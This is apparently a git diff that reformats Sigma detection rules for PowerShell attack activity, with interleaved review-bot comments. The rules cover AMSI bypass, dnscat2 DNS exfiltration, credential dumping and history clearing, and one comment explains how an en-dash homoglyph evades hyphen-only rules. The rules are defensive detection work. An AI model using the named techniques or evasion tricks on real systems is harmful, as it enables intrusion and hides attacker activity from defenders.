+++ b/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml @@ -1,8 +1,7 @@ title: PowerShell ADRecon Execution id: bf72941a-cba0-41ea-b18c-9aca3925690d status: test -description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been - reported to be actively used by FIN7 +description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 references: - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1 - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 @@ -28,7 +27,7 @@ detection: - Function Get-ADRExcelComOb - Get-ADRGPO - Get-ADRDomainController - - ADRecon-Report.xlsx + - ADRecon-Report.xlsx # Default condition: ps_script and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml index 39985cf62..6d1336744 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml @@ -1,8 +1,7 @@ title: AMSI Bypass Pattern Assembly GetType id: e0d6c087-2d1c-47fd-8799-3904103c5a98 status: test -description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell - scripts +description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml index e4c294d49..13a5997f7 100644 
--- a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Script Using NULL Bits id: fa2559c8-1197-471d-9cdd-05a0273d4522 related: - - id: 92a974db-ab84-457f-9ec0-55db83d7a825 - type: similar + - id: 92a974db-ab84-457f-9ec0-55db83d7a825 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml b/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml index 8e1c4dd21..58a5d2c06 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml @@ -28,6 +28,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational empire: + # better to randomise the order ScriptBlockText|contains|all: - System.Diagnostics.Process - Stop-Computer @@ -36,6 +37,7 @@ detection: - $cmdargs - Close-Dnscat2Tunnel dnscat: + # better to randomise the order ScriptBlockText|contains|all: - set type=$LookupType`nserver - $Command | nslookup 2>&1 | Out-String diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml index 1fe172f8d..166ddda94 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml 
@@ -1,8 +1,7 @@ title: Get-ADUser Enumeration Using UserAccountControl Flags id: 96c982fe-3d08-4df4-bed2-eb14e02f21c8 status: test -description: Detects AS-REP roasting is an attack that is often-overlooked. It is - not very common as you have to explicitly set accounts that do not require pre-authentication. +description: Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting - https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/ @@ -22,6 +21,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: + # 4194304 DONT_REQ_PREAUTH ScriptBlockText|contains|all: - Get-ADUser - -Filter diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml index 2202803bb..3033bccd0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml @@ -25,6 +25,8 @@ detection: - BinaryWriter selection_header_wav: ScriptBlockText|contains|all: + # Byte chunks from the WAV header used in the example POC + # You can extend this for different audio formats by adding different selections - '0x52' - '0x49' - '0x46' diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml b/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml index 7592e6092..e4630504c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml 
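Review bot: In `posh_ps_as_rep_roasting.yml`, the comment `# 4194304 DONT_REQ_PREAUTH` is placed above `ScriptBlockText|contains|all:` rather than on the entry it annotates, and that entry is not visible in this hunk (the list continues outside it), so a reader cannot tie the number to a match. Put the comment on the entry itself and name the flag fully, e.g. `# 4194304 = 0x400000, the userAccountControl DONT_REQ_PREAUTH bit (accounts that skip Kerberos pre-authentication)`. The rest of the selection list starts after the end of this hunk.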
@@ -1,8 +1,7 @@
 title: Automated Collection Command PowerShell
 id: c1dda054-d638-4c16-afc8-53e007f3fbc5
 status: test
-description: Once established within a system or network, an adversary may use automated
- techniques for collecting internal data.
+description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml b/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml
index a03f9fb4c..3c1b9e7f9 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml
@@ -1,13 +1,9 @@
 title: Windows Screen Capture with CopyFromScreen
 id: d4a11f63-2390-411c-9adf-d791fd152830
 status: test
-description: 'Adversaries may attempt to take screen captures of the desktop to gather
- information over the course of an operation.
-
- Screen capturing functionality may be included as a feature of a remote access
- tool used in post-compromise operations
-
- '
+description: |
+ Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.
+ Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml
index d04eeb73a..cda14fb97 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml
@@ -1,8 +1,8 @@
 title: Clear PowerShell History - PowerShell
 id: 26b692dc-1722-49b2-b496-a8258aa6371d
 related:
- - id: dfba4ce1-e0ea-495f-986e-97140f31af2d
- type: derived
+ - id: dfba4ce1-e0ea-495f-986e-97140f31af2d
+ type: derived
 status: test
 description: Detects keywords that could indicate clearing PowerShell history
 references:
@@ -33,7 +33,7 @@ detection:
 selection_2:
 ScriptBlockText|contains|all:
 - Set-PSReadlineOption
- - "\u2013HistorySaveStyle"
+ - –HistorySaveStyle # not sure if the homoglyph –/- is intended, just checking for both
 - SaveNothing
 selection_3:
 ScriptBlockText|contains|all:
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml
index 1cace907f..a018b489e 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml
@@ -1,9 +1,7 @@
 title: Clearing Windows Console History
 id: bde47d4b-9987-405c-94c7-b080410e8ea7
 status: test
-description: Identifies when a user attempts to clear console history. An adversary
- may clear the command history of a compromised account to conceal the actions
- undertaken during an intrusion.
+description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
 references:
 - https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/
 - https://www.shellhacks.com/clear-history-powershell/
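Review bot: The comment on `–HistorySaveStyle` says the rule is `checking for both`, but `selection_2` as shown carries only the en dash (U+2013) spelling; the ASCII `-HistorySaveStyle` form must live in another selection (`selection_1` is outside the hunk), and the comment should name it rather than leave the reader to guess. The en dash is not a copy-paste artefact to be normalised away: PowerShell's tokenizer accepts U+2013, U+2014 and U+2015 as the parameter dash, so `Set-PSReadlineOption –HistorySaveStyle SaveNothing` executes normally and would slip past a rule that only knows the hyphen. Suggest replacing the comment with `# U+2013 en dash; PowerShell accepts it as a parameter dash, so this is a real evasion variant; ASCII '-' is covered in selection_1` (adjust the selection name once confirmed). Detection behaviour is unchanged by this hunk, since `"\u2013HistorySaveStyle"` and the literal en dash resolve to the same string, but the literal form is invisible in many editors, which is exactly why the comment matters.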
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml b/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
index 6bc2506c6..1d6120c2f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
@@ -1,8 +1,7 @@
 title: Powershell Create Scheduled Task
 id: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb
 status: test
-description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling
- for initial or recurring execution of malicious code
+description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml b/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
index 486493732..0e8c96512 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
@@ -1,11 +1,10 @@
 title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
 id: db885529-903f-4c5d-9864-28fe199e6370
 related:
- - id: 435e10e4-992a-4281-96f3-38b11106adde
- type: similar
+ - id: 435e10e4-992a-4281-96f3-38b11106adde
+ type: similar
 status: test
-description: Detects usage of the Get-ADComputer cmdlet to collect computer information
- and output it to a file
+description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
@@ -36,7 +35,6 @@ detection:
 - Add-Content
 condition: ps_script and selection
 falsepositives:
- - Legitimate admin scripts may use the same technique, it's better to exclude
- specific computers or users who execute these commands or scripts often
+ - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml b/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml
index 045f8acf2..b35dc6925 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml
@@ -1,8 +1,7 @@
 title: Powershell Install a DLL in System Directory
 id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd
 status: test
-description: Uses PowerShell to install/copy a a file into a system directory such
- as "System32" or "SysWOW64"
+description: Uses PowerShell to install/copy a a file into a system directory such as "System32" or "SysWOW64"
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
 author: frack113, Nasreddine Bencherchali
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml b/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml
index 1b292c263..9532f2f9f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml
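Review bot: The re-joined description keeps the duplicated article, `install/copy a a file`; it should read `Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"`. The title promises `Install a DLL` while the description covers any file, and the single reference is the password-filter DLL atomic; since the selection is outside the hunk I cannot tell which is accurate, but the two should agree so analysts know whether a copied `.exe` or `.ps1` is expected to fire.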
@@ -1,21 +1,12 @@
 title: Registry-Free Process Scope COR_PROFILER
 id: 23590215-4702-4a70-8805-8dc9e58314a2
 status: test
-description: 'Adversaries may leverage the COR_PROFILER environment variable to hijack
- the execution flow of programs that load the .NET CLR.
-
- The COR_PROFILER is a .NET Framework feature which allows developers to specify
- an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process
- that loads the Common Language Runtime (CLR).
-
- These profiliers are designed to monitor, troubleshoot, and debug managed code
- executed by the .NET CLR.
-
+description: |
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.
+ The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).
+ These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.
 (Citation: Microsoft Profiling Mar 2017)
-
 (Citation: Microsoft COR_PROFILER Feb 2013)
-
- '
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler
 author: frack113
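Review bot: The new block scalar carries the misspelling `profiliers` forward; the line should read `These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.` The two `(Citation: Microsoft Profiling Mar 2017)` / `(Citation: Microsoft COR_PROFILER Feb 2013)` lines are MITRE ATT&CK source markers copied from the technique text and point at nothing in this rule's `references:` list; either drop them or replace them with the Microsoft profiling documentation URL under `references:` so the description reads as the rule's own prose.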
@@ -1,8 +1,7 @@
 title: Create Volume Shadow Copy with Powershell
 id: afd12fed-b0ec-45c9-a13d-aa86625dac81
 status: test
-description: Adversaries may attempt to access or create a copy of the Active Directory
- domain database in order to steal credential information
+description: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information
 references:
 - https://attack.mitre.org/datasources/DS0005/
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml b/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml
index 1c6d0284d..1d29a055d 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml
@@ -1,13 +1,9 @@
 title: Powershell Detect Virtualization Environment
 id: d93129cd-1ee0-479f-bc03-ca6f129882e3
 status: test
-description: 'Adversaries may employ various system checks to detect and avoid virtualization
- and analysis environments.
-
- This may include changing behaviors based on the results of checks for the presence
- of artifacts indicative of a virtual machine environment (VME) or sandbox
-
- '
+description: |
+ Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
+ This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md
 - https://techgenix.com/malicious-powershell-scripts-evade-detection/
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml b/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml
index aed2ba886..aa7f32aa7 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml
@@ -1,8 +1,7 @@
 title: DirectorySearcher Powershell Exploitation
 id: 1f6399cf-2c80-4924-ace1-6fcff3393480
 status: test
-description: Enumerates Active Directory to determine computers that are joined to
- the domain
+description: Enumerates Active Directory to determine computers that are joined to the domain
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml b/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml
index 2e474d24a..40ce174e4 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml
@@ -1,14 +1,9 @@
 title: Manipulation of User Computer or Group Security Principals Across AD
 id: b29a93fb-087c-4b5b-a84d-ee3309e69d08
 status: test
-description: 'Adversaries may create a domain account to maintain access to victim
- systems.
-
- Domain accounts are those managed by Active Directory Domain Services where access
- and permissions are configured across systems and services that are part of that
- domain..
-
- '
+description: |
+ Adversaries may create a domain account to maintain access to victim systems.
+ Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell
 - https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml
index 7ef3a0123..2e8988cd7 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml
@@ -1,8 +1,7 @@
 title: Disable Powershell Command History
 id: 602f5669-6927-4688-84db-0d4b7afb2150
 status: test
-description: Detects scripts or commands that disabled the Powershell command history
- by removing psreadline module
+description: Detects scripts or commands that disabled the Powershell command history by removing psreadline module
 references:
 - https://twitter.com/DissectMalware/status/1062879286749773824
 author: Ali Alwashali
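Review bot: The block scalar on the new side ends with a doubled full stop, `part of that domain..`; drop one. The description is only about creating a domain account (the T1136.002 atomic), whereas the title speaks of manipulating user, computer or group principals, which is considerably wider; if the selection (outside the hunk) matches `System.DirectoryServices.AccountManagement` usage generally, one sentence such as `The rule matches use of the System.DirectoryServices.AccountManagement namespace, which also covers modification and deletion of principals.` would make title and description agree.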
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml b/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml
index e228eadec..e850e3d13 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml
@@ -1,13 +1,9 @@
 title: Disable-WindowsOptionalFeature Command PowerShell
 id: 99c4658d-2c5e-4d87-828d-7c066ca537c3
 status: test
-description: 'Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment
- Image Servicing and Management tool.
-
- Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure,
- and update features and packages in Windows images
-
- '
+description: |
+ Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
+ Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md
 - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
@@ -32,11 +28,13 @@ detection:
 - -Online
 - -FeatureName
 selection_feature:
+ # Add any important windows features
 ScriptBlockText|contains:
 - Windows-Defender-Gui
 - Windows-Defender-Features
 - Windows-Defender
 - Windows-Defender-ApplicationGuard
+ # - 'Containers-DisposableClientVM' # Windows Sandbox
 condition: ps_script and (all of selection*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml
index d6283f481..30b1a3760 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml
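Review bot: In `selection_feature` the value `Windows-Defender` under `ScriptBlockText|contains` already matches any script block that contains `Windows-Defender-Gui`, `Windows-Defender-Features` or `Windows-Defender-ApplicationGuard`, so those three entries add nothing to the match; keep them only as documentation of the intended feature names and say so, e.g. `# 'Windows-Defender' subsumes the more specific names; they are listed for readability`. The commented-out `Containers-DisposableClientVM` line is a sensible extension point, but a maintainer enabling it should know that `all of selection*` also requires the `-Online` and `-FeatureName` strings from the selection whose header is outside the hunk, so an invocation that passes the feature name positionally or services an offline image with `-Path` will not fire regardless of which features are listed here.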
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml
@@ -24,6 +24,6 @@ detection:
 ScriptBlockText|contains: Start-Dnscat2
 condition: ps_script and selection
 falsepositives:
- - "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)"
+ - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)
 level: critical
 ruletype: Sigma
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml
index b2dc180da..70eb3e3f5 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml
@@ -1,8 +1,7 @@
 title: Potential In-Memory Execution Using Reflection.Assembly
 id: ddcd88cb-7f62-4ce5-86f9-1704190feb0a
 status: test
-description: Detects usage of "Reflection.Assembly" load functions to dynamically
- load assemblies in memory
+description: Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml b/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml
index 3fa0e632b..289984ab2 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml
@@ -1,11 +1,10 @@
 title: Potential COM Objects Download Cradles Usage - PS Script
 id: 3c7d1587-3b13-439f-9941-7d14313dbdfe
 related:
- - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf
- type: similar
+ - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf
+ type: similar
 status: test
-description: Detects usage of COM objects that can be abused to download files in
- PowerShell by CLSID
+description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
 references:
 - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml
index da6b3aac6..d7ef3ef15 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml
@@ -1,13 +1,9 @@
 title: Dump Credentials from Windows Credential Manager With PowerShell
 id: 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc
 status: test
-description: 'Adversaries may search for common password storage locations to obtain
- user credentials.
-
- Passwords are stored in several places on a system, depending on the operating
- system or application holding the credentials.
-
- '
+description: |
+ Adversaries may search for common password storage locations to obtain user credentials.
+ Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml
index 40dfb9fb4..bc08260bf 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml
@@ -1,9 +1,7 @@
 title: Enable Windows Remote Management
 id: 991a9744-f2f0-44f2-bd33-9092eba17dc3
 status: test
-description: Adversaries may use Valid Accounts to interact with remote systems using
- Windows Remote Management (WinRM). The adversary may then perform actions as the
- logged-on user.
+description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml
index 94bda0a02..dd5260920 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml
@@ -1,16 +1,12 @@
 title: Potential Suspicious Windows Feature Enabled
 id: 55c925c1-7195-426b-a136-a9396800e29b
 related:
- - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
- type: similar
+ - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
+ type: similar
 status: test
-description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature"
- used as a Deployment Image Servicing and Management tool.
-
- Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure,
- and update features and packages in Windows images
-
- '
+description: |
+ Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+ Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
 references:
 - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
 - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
@@ -36,6 +32,7 @@ detection:
 - -Online
 - -FeatureName
 selection_feature:
+ # Add any insecure/unusual windows features to your env
 ScriptBlockText|contains:
 - TelnetServer
 - Internet-Explorer-Optional-amd64
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml
index d3ad5e426..e5cda5e53 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml
@@ -1,13 +1,9 @@
 title: Enumerate Credentials from Windows Credential Manager With PowerShell
 id: 603c6630-5225-49c1-8047-26c964553e0e
 status: test
-description: 'Adversaries may search for common password storage locations to obtain
- user credentials.
-
- Passwords are stored in several places on a system, depending on the operating
- system or application holding the credentials.
-
- '
+description: |
+ Adversaries may search for common password storage locations to obtain user credentials.
+ Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
